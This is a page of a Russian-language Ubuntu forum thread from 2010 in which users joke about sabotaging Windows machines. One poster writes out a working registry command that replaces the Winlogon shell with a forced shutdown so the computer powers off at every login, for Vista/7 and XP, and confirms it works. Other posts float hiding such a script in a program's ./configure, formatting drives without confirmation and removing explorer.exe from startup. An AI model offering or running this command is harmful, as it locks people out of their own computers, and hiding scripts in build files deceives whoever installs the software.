Лаборатория Ubuntu
Опыт установки, настройки и использования
Ubuntu Linux Вопросы и ответы Об Ubuntu Новости Игры Записки для новичка
Поиск:

Root pass {РЕШЕНО} | Форум


Вернуться к спискам тем

 Милан Йованович создал тему 25.01.2010 в 21:00
 Юзер  Сообщений: 182
 Репутация: 83

 Сейчас не на форуме
Есть ещё пофикшеная версия, которая не выдаёт сообщений об ошибках или чего-либо подобного. Благодара выводу ошибок в /dev/null и замены cat на echo в начале.
Цитировать

 Менеджер по рекламе рекомендует
 Знаток своего дела  Сообщений: 1987
 Репутация: 5055

 Сейчас на форуме

 Милан Йованович ответил 25.01.2010 в 21:01
 Юзер  Сообщений: 182
 Репутация: 83

 Сейчас не на форуме
Есть ещё аналог на bash-скриптах . Его бы в ./configure скрипт проги какой-нибудь запихнуть . :D
Цитировать

 Андрей Blind ответил 26.01.2010 в 0:10
 Юзер  Сообщений: 114
 Репутация: 56

 Сейчас не на форуме
ну и четы тут дурью страдаешь?)лучше подумал бы аналогичный скрипт для винды)чтоб например дрова все сносило,или винт форматировало)
Цитировать

 Гость ответил 26.01.2010 в 0:13
 Студент  Сообщений: 228
 Репутация: 101

 Сейчас не на форуме
reg add HKLM092;software092;Microsoft092;windows nt092;currentversion092;winlogon /v Shell /d shutdown /f /s /t 1 /fпробуйте :D на венде, правда это виста092;7для хп так:reg add HKLM092;software092;Microsoft092;windows nt092;currentversion092;winlogon /v Shell /d shutdown -f -s -t 1 /fчуть чуть паники после этого обеспечено )
Цитировать

 Андрей Blind ответил 26.01.2010 в 0:20
 Юзер  Сообщений: 114
 Репутация: 56

 Сейчас не на форуме
чето мне кажется,что оно не совсем коректно будет работать)команда шутдаун в венде вместо того,чтоб выключить комп выходит из ползователя)а что вообще должно произойти?)
Цитировать

 Гость ответил 26.01.2010 в 0:21
 Студент  Сообщений: 228
 Репутация: 101

 Сейчас не на форуме
работает ) только что потестил на ХПкогда юзер логгинится то вместо проводника появляется окно на секунду работа будет прекращена исчезает и комп вырубается
Цитировать

 Милан Йованович ответил 26.01.2010 в 0:33
 Юзер  Сообщений: 182
 Репутация: 83

 Сейчас не на форуме
Я видел скрипт, который в винде форматит C,D и E. Без подтверждений. Могу загуглить для травли виндузятников.
Цитировать

 Гость ответил 26.01.2010 в 0:36
 Студент  Сообщений: 228
 Репутация: 101

 Сейчас не на форуме
та это в старых системах. сейчас пишед диск юзается
Цитировать

 Андрей Blind ответил 26.01.2010 в 0:42
 Юзер  Сообщений: 114
 Репутация: 56

 Сейчас не на форуме
надо замутить еще скрипт,который уберет explorer.exe из автозагрузки и поставит на рабочий стол обоями синий экран смерти))))))))
Цитировать

 Басистый Илюх ответил 26.01.2010 в 1:53
 Новичок  Сообщений: 11
 Репутация: 14

 Сейчас не на форуме
черти ))))))))))))))))))) виндовззззз маст дай
Цитировать


Чтобы ответить, нужно авторизоваться здесь

Страницы: 1 2 3 4 5


Пользователь
Авторизация на сайте:
Email:
Пароль:
Запомнить (Регистрация)

Новости
Ubuntu
Linux
Сайт
Игры
 Игры для Ubuntu
Текущие проблемы:
GRUB 2 после обновления [РЕШЕНО]
Дата создания: 09.03.2010 10:53
Ubuntu server 8.04 и интернет
Дата создания: 09.03.2010 10:35
Ubuntu ipod(Touch)
Дата создания: 09.03.2010 1:07
Проблема с Transmission 1.75
Дата создания: 09.03.2010 0:45
Тормозит bdRip во всех плеерах(решено)
Дата создания: 08.03.2010 22:57
Выйти из зависшего 3D приложения
Дата создания: 08.03.2010 22:41

2010-2012 © Лаборатория Ubuntu